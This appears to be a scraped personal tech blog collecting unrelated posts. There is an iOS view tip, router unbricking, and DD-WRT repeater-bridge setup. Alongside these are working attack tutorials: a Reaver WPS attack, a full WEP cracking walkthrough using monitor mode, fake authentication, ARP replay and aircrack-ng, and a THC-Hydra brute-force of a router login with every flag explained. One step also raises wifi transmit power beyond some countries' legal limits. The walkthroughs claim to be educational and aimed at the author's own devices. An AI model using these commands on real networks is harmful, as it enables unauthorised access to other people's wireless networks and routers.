self.window.rootViewController = “Your View Controller”

if you use [self.window addSubview:"Your View Controller".view] you will end up being 20px out

Requires linux

wget http://reaver-wps.googlecode.com/files/reaver-1.2.tar.gz
tar -xzvf reaver-1.2.tar.gz
cd reaver-1.2/src/
./configure
make
make install
airmon-ng wlan0
reaver -i mon0 -b -vv

Doesn’t work against my Belkin N300

I am going to crack my wireless access point with a Macbook pro running Backtrack 5 as a virtual machine. To do this in a virtual machine you must use a usb wifi adapter, built in hardware will NOT WORK in a VM.

Watch the video to see it in action and then read the post full the break down

http://www.youtube.com/watch?v=1zBQrkdt45w

My setup is as follows

• Backtrack 5 R1 VM
• USB Alfa AWUS036H (100mW) wifi adapter with 5dB arial (Very cheap off eBay and a lot with free delivery out there)

sudo apt-get install aircrack-ng

run this command (only if you have a high powered card like the Alfa)

iw reg set NZ

Important to note you may not be able to reach 1000mW depending on the laws set in your country.

ifconfig wlan0 down

ifconfig wlan0 up

iwconfig

If it has worked you should see the TX Power is now at 30dB, we can now get started.
Your wireless adapter must be in monitor mode, most wireless cards require special drivers and the guys behind Backtrack have taken care of this for us.

airmon-ng start wlan0

airodump-ng mon0

airodump-ng mon0 -c 6 –bssid 00:1c:8c:d0:70:ec -w crackme

Leave this window running and open a second terminal, we will fake authenticate our wifi card with the device, if we don’t the replay attack will fail. If there are devices on the network skip to the replay attack.

aireplay mon0 -1 3 -a 00:1c:8c:d0:70:ec

All going well you will see “Association successful ”

Now to perform a ARP replay attack which captures a ARP packets and sends it over and over to generate traffic on the access point. Modify your command so it looks like this

aireplay mon0 -3 -b 00:1c:8c:d0:70:ec

Give it some time and all going well you will start to see the “Data” figure from the aircrack window start to increase.

Once that begins its just a matter of time before it’s cracked, you can start cracking the file right away even while data is still begin collected. Open yet a third console and run

aircrack-ng crackme

The password will not be recovered until enough data has been collected, it will automatically retry once the data increases.

Watch the video if you are unclear

I have changed over to WordPress from Joomla and of some content has shifted around, I have not brought across the comments so please get commenting again!!

Follow us on twitter to keep up to date with new articles.

A quick guide to get your ASUS WL-520GC back to factory firmware if you have a bad flash (AKA Bricked).

You will need;

1. ASUS Firmware utility

2. Original firmware

You can find both of the above from the ASUS website or simply download from links below

• ASUS Utility
• ASUS WL-520GC Firmware

As always proceed at your own risk

First we need to get the ASUS into recovery mode, do this by holding the reset button for 3-5 seconds, the power button will begin to blink slowly (2 seconds on 2 seconds off)

Connect your computer directly to the ASUS router with a LAN cable

Next we need to give our LAN a static IP address on the devices range (Default IP of the ASUS is 192.168.1.1) so we will set a IP address of our pc to something in the same range. Test if you can ping 192.168.1.1

Extract FW_WL520gc_2010_EN.zip to your desktop so it is easy to locate

Now we need to extract the contents of UT_WL_520GC_3540.zip and run the setup wizard. Once installed run the ASUS Firmware Restoration tool

Locate the firmware you extract to your desktop,select it, hit upload. Wait for the tool to finish and you should be back to original firmware.

using THC-HYDRA

If you receive a popup window when you try to access your router, then this method should work for you.

Read the article then watch the movie

THC-Hydra – can be downloaded from their site here
Password list – try openwall’s free list

Find your router IP, you should already know this, mine is 192.168.1.2. It is a DSL-G604T and the default username for this router is “admin”.
If for some reason you can’t remember yours try a default password site such as CIRT.net

Make sure you have downloaded and extracted THC-Hydra. I have extracted mine to C:\CMD\Hydra in this example and I also have my password list in the Hydra directory.

Open a command prompt and navigate to the Hydra directory
to change directory in dos used the “CD” command followed by the path CD C:\CMD\Hydra

run the command below substituting in your values
(command flags are case sensitive).

hydra -l {username} -P {password list path} -s {port} {IP Address} http-get /
My command looks like:
hydra -l admin -P password.lst -s 80 192.168.1.2 http-get /

Command break down:
hydra –> the hydra program
-l –> (lower case “L” not to be confused with a upper case i) single username to target. Use uppercase -L to specify a username list
-P –> provide path to password lis. -p to try a single password ie “passw0rd”
-s –> port to target your router may run on a different port such as 8080
{IP Address} hopefully this is clear
http-get –> service to brute force
“/” –> this specifies the page to target if this is left out the command will not run. “/” just indicates the root do not include the ”
you will get an output line with username and password if you are successful.
This attack is only as good as your dictionary.

Next how to brute force web forms, check it out!!

IMPORTANT:
This is for educational purposes only, dont go attacking devices which don’t belong to you .

Aircrack would not play nice on Ubuntu with a Intel Wireless iwl3945 wifi adapter

It would always say “mon0 is on channel -1, but the AP uses channel x”

Solution:

You need to patch the compact-wireless package and rebuild

Copy and paste the below commands into a terminal

Install your kernel headers if you don’t already have them, if you do skip the first command

Code:

sudo apt-get install linux-headers-$(uname -r)
wget http://www.orbit-lab.org/kernel/compat-wireless-3.0-stable/v3.0/compat-wireless-3.0-2.tar.bz2
tar -jxf compat-wireless-3.0-2.tar.bz2
cd compat-wireless-3.0-2
wget http://patches.aircrack-ng.org/channel-negative-one-maxim.patch
sudo apt-get install patch
patch ./net/wireless/chan.c channel-negative-one-maxim.patch
make
sudo make install
sudo make unload
sudo reboot

Standard bridge mode does not allow wifi clients to connect to the ASUS running DD-WRT only wired clients…. But if you use repeater bridge mode you can have wired and wifi clients accessing the bridge extending your network.

Make sure you have followed the steps outlined in the following guide and the system is working before you move onto this or you will have problems !!

For those just joining my setup is as follows

Dlink G604T ADSL Router Primary wifi

SSID: JANDD

Security: WPA PSK (TKIP)

IP: 192.168.1.2

DHCP: On

Asus WL-520GC in bridge mode connected to the dlink wifi, xbox 360 conneted via ethernet port… xbox live works yay.

IP: 192.168.1.5

OK lets get started

Login to your ASUS WL-520 and navigate to Wireless – Basic Setup

Change Wireless Mode to “Repeater Bridge” as below – Hit Save

You will now have “Virtual Interfaces” click Add

Enter a new SSID it’s recommended it is different than your primary SSID, you can have it the same but you may have issues.

I am calling mine “JANDD2″ – Hit Save

Navigate to Wireless – Wireless Security where we can see our new interface that we just added “JANDD2″.  Now configure the details of the new wifi to be the same as the primary, same security mode and password – Hit Save

Navigate to Setup – Basic Setup set STP to disabled – Hit Save

Navigate to Setup – Advanced Routing change operating mode to router – Hit Save

Navigate to Services disable DNSMasq – Hit Save

Navigate to Security – Firewall disable SPI Firewall, untick all except filter multicast – Hit Save

Now Hit – Apply Settings

Navigate to Administration – Management and reboot router wait a couple minutes for it to come up and enjoy !!

Credit to the good people at DD-WRT for this, this information has just been regurgitated.